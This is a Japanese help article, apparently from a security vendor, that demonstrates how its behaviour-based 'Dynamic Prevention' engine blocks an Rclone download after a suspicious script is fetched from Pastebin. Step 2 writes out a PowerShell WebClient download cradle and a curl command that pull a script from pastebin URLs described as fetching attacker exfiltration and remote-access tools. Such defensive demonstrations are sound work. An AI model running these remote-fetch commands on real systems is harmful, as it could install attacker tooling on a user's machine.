ダイナミックプ防止がネットワークを保護する方法のデモンストレーション

概要

ダイナミックプ防止は、脅威を検出して攻撃の面を縮小し、影響を受ける前に脅威を軽減する動的な制御を適用する、行動ベースのセキュリティエンジンです。 詳細については、ダイナミックプ防止とは?を参照してください。

この記事は、ダイナミックプ防止がネットワークを保護する方法を示すために、実際の攻撃シナリオをシミュレートします。 この例では、ユーザーがPastebinからスクリプトをダウンロードし、攻撃者が将来の攻撃を実行するために必要な追加の高リスクツールを取得しようとする方法を試みます。 ダイナミックプ防止は悪意のある動作を識別し、ツールのダウンロードをブロックし、攻撃が進行する前に防ぎます。

この攻撃への対応は完全に自動化されています。 追加のルールは必要ありません。 ダイナミックプ防止を有効にするだけで攻撃を防ぐことができます。

この攻撃をシミュレートするために:

  1. ブロックされずに高リスクのツールをダウンロードする
  2. Pastebinからスクリプトをダウンロードする
  3. 高リスクツールを再度ダウンロードしようと試みる。 この時点では、ダウンロードはブロックされます。

前提条件

  • ダイナミックプ防止が有効になり、アクションがブロックに設定されています

ステップ 1: 高リスクツールをダウンロード

ダイナミックプ防止が、悪意のあるシーケンスの一部である場合のみアクションをブロックすることを示すために、まずRcloneというオープンソースのコマンドラインツールをダウンロードします。 攻撃者は通常、Rcloneを合法的で強力な通常の管理活動と調和するため、事後合意のツールとして使用します。

アクション

いずれかからRcloneをダウンロードします:

  • 次のURL: https://downloads.rclone.org/rclone-current-windows-amd64.zip
  • Windowsデバイスにおいて:

    • 次のPowerShellコマンド: Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
  • macOS/Linuxデバイスにおいて:

    • 次のTerminalコマンド: curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

結果

ファイルが正常にダウンロードされます。

説明

このことから、単独では行動がブロックされないことが確認できますが、不審な活動が先行しなかった場合は悪意とされないためです。

ステップ 2: Pastebinからスクリプトをダウンロード

攻撃の開始をシミュレートするために、実行するとRcloneやAnyDeskのようなリモートアクセスと漏えいのための一般的な攻撃者ツールをダウンロードするスクリプトをPastebinからダウンロードします。

アクション

Pastebinからスクリプトをダウンロードして実行:

  • Windowsデバイスにおいて:

    • 次のPowerShellコマンド: (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
  • macOS/Linuxデバイスにおいて:

    • 次のTerminalコマンド: curl -sSL "https://pastebin.com/raw/tXhVK2V7"

結果

スクリプトが実行され、ツールをダウンロードします。 ホストに動的制御が適用され、脅威ダッシュボードコントロール付きホストウィジェットに表示されます。 詳細については、脅威分析の使用を参照してください。

Dynamic_Prevention1.png

説明

ダイナミックプ防止は、不審な行動の指標を検出し、攻撃が進行する前に悪意のある後続のアクションをブロックするためにコントロールを強制的に適用します。

ステップ 3: 高リスクツールをダウンロード

このシミュレートされた攻撃では、攻撃者がRcloneをダウンロードしようとします。 しかし、このアクションがPastebinからスクリプトをダウンロードするという不審な活動に続いており、コントロールが適用されているため、ダイナミックプ防止はRcloneダウンロードをブロックします。

アクション

いずれかからRcloneをダウンロードします:

  • 次のURL: https://downloads.rclone.org/rclone-current-windows-amd64.zip
  • Windowsデバイスにおいて:

    • 次のPowerShellコマンド: Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
  • macOS/Linuxデバイスにおいて:

    • 次のTerminalコマンド: curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

結果

このファイルのダウンロードは、コントロールによってブロックされます。 軽減された脅威は、脅威ダッシュボード軽減された脅威を持つホストウィジェットに表示されます。

DP5.png

説明

ステップ1では、このスクリプトが単独で実行され、許可されましたが、今回は不審な行動に先行されており、ダイナミックプ防止によってブロックされます。

デモンストレーション

この動画はこの模擬攻撃のデモンストレーションを示しています。

この記事は役に立ちましたか?

0人中0人がこの記事が役に立ったと言っています

0件のコメント